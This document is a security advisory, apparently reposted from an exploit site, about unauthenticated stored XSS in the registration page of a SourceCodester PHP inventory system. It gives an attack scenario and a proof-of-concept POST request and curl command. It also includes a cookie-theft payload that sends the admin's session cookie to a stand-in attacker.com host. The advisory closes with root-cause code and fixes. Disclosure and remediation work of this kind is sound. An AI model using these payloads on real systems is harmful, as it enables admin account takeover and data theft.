## https://sploitus.com/exploit?id=F25EBE33-64F2-56B1-9C60-5B5A2FB4D486
# Stored XSS in Inventory System using PHP and MySQL
## Vulnerability Details
| Field | Details |
|---|---|
| **Vulnerability Type** | Stored Cross-Site Scripting (XSS) |
| **Affected Application** | Inventory System using PHP and MySQL |
| **Vendor** | SourceCodester |
| **Affected Version** | 1.0 |
| **Affected File** | `register.php` |
| **Parameters** | `fullname`, `username` |
| **Authentication Required** | No (Unauthenticated) |
| **Impact** | Admin session hijacking, malicious script execution in admin panel |
| **CVSS Score** | 8.8 (High) |
| **CVSS Vector** | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N |
---
## Description
The **Inventory System using PHP and MySQL** by SourceCodester (submitted May 23, 2026) is vulnerable to **Unauthenticated Stored Cross-Site Scripting (XSS)** in the Staff Registration module (`register.php`).
The `fullname` and `username` input fields fail to sanitize or encode user-supplied input before storing it in the database. When an administrator visits the **User Management** page (`users.php`), the unsanitized payloads are rendered directly in the HTML context, causing immediate JavaScript execution in the admin's browser session.
Because registration requires **no authentication**, a remote, unauthenticated attacker can inject arbitrary JavaScript that will execute in the context of any administrator who views the User Management panel.
---
## Attack Scenario
1. Attacker visits `/product_inventory/register.php` โ no login required.
2. Attacker submits a malicious payload in the `fullname` and/or `username` fields.
3. Payload is stored in the database without sanitization.
4. When the admin logs in and navigates to `/product_inventory/users.php`, the payload executes automatically in the admin's browser.
5. Attacker can steal the admin's session cookie, redirect the admin to a phishing page, or perform any action on behalf of the admin.
---
## Proof of Concept
### Step 1 โ Navigate to the Registration Page (No Auth Required)
```
http:///product_inventory/register.php
```
### Step 2 โ Submit the Following Registration Form
**Full Name field payload:**
```
alert(1)
```
**Username field payload:**
```
alert(2)
```
**Password:** any value (e.g., `test1234`)
### Step 3 โ HTTP Request (Burp Suite / curl)
```http
POST /product_inventory/register.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
fullname=alert(1)&username=alert(2)&password=test1234&submit=
```
**curl equivalent:**
```bash
curl -X POST "http:///product_inventory/register.php" \
-d "fullname=alert(1)&username=alert(2)&password=test1234&submit="
```
### Step 4 โ Trigger as Admin
Log in as administrator and navigate to:
```
http:///product_inventory/users.php
```
Both payloads execute immediately upon page load.
---
## Impact
An unauthenticated attacker can:
- **Steal admin session cookies** โ escalating to full admin account takeover
- **Redirect admin to phishing pages**
- **Perform admin-level actions** silently via JavaScript (create/delete users, manipulate inventory)
- **Deploy a persistent keylogger** in the admin panel
- **Deface the admin interface**
Session cookie theft example payload (replace with attacker server):
```javascript
document.location='http://attacker.com/steal?c='+document.cookie
```
---
## Screenshots
### Step 1 โ Injecting Payloads in Registration Form
### Step 2 โ XSS Fires on Admin users.php
---
## Affected Code (Root Cause)
The vulnerability exists because `register.php` inserts user input directly into the database without sanitization, and `users.php` outputs the stored values without `htmlspecialchars()` encoding.
**Vulnerable pattern in `users.php` (approximate):**
```php
// Unsafe โ outputs raw database value directly into HTML
echo $row['fullname'];
echo $row['username'];
```
**Fix โ apply output encoding:**
```php
echo htmlspecialchars($row['fullname'], ENT_QUOTES, 'UTF-8');
echo htmlspecialchars($row['username'], ENT_QUOTES, 'UTF-8');
```
Additionally, input should be sanitized on insertion in `register.php` using `strip_tags()` or prepared statements with proper validation.
---
## Remediation
1. Encode all output using `htmlspecialchars()` with `ENT_QUOTES` before rendering user-supplied data in HTML.
2. Validate and sanitize all input fields on the server side at point of entry.
3. Implement a Content Security Policy (CSP) header to mitigate XSS impact.
---
## References
- [SourceCodester โ Inventory System using PHP and MySQL]([https://www.sourcecodester.com/php/inventory-system-using-php-and-mysql-source-code](https://www.sourcecodester.com/php/18722/php-inventory-system.html)
---
*Reported by Syed Imad Uddin Alvi โ Independent Security Researcher*